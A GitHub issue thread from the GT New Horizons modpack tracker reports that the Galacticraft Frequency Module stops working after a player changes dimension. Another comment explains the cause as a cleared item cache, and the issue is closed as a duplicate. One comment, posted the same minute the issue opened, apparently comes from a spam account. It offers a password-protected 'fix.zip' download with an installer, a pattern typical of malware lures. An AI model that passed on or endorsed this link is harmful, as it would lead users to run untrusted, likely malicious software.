### ISSUE TITLE
Frequency Module needs to be re-equipped to work on space stations or planets

### ISSUE THREAD

**Issue by Diamantino-Op** [GTNewHorizons/GT-New-Horizons-Modpack#17113] opened 2024-08-26 14:59 UTC
### Your GTNH Discord Username

diamantinoop

### Your Pack Version

Nigtly 603

### Your Server

Private Server

### Java Version

Java 21

### Type of Server

Vanilla Forge

### Your Expectation

Frequency module should work whithout needing to re-equip it every time you go / tp to a planet or space station.

### The Reality

Need to re-equip the frequency module every time

### Your Proposal

Fix it somehow.

### Final Checklist

- [X] I have searched this issue tracker and there is nothing similar already. Posting on a closed issue saying the bug still exists will prompt us to investigate and reopen it once we confirm your report.
- [X] I can reproduce this problem consistently by follow the exact steps I described above, or this does not need reproducing, e.g. recipe loophole.
- [ ] I have asked other people and they confirm they also have this problem by follow the exact steps I described above, or this does not need reproducing, e.g. recipe loophole.

**Comment by CosionMa** [comment] 2024-08-26 14:59
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cargocats** [comment] 2024-08-26 19:48
The cause of this seems to be that when a dimension is unloaded, it clears the playerItemData cache, which is used to determine if a player is wearing a Frequency Module. However, playerItemData is only updated when the player equips any Galacticraft gear and is not updated when a player goes to a new dimension.

**Comment by chochem** [comment] 2024-11-07 18:53
duplicate of https://github.com/GTNewHorizons/GT-New-Horizons-Modpack/issues/13839

**Closed by chochem** 2024-11-07 18:53 UTC
Labels: Bug: Minor, Status: Triage
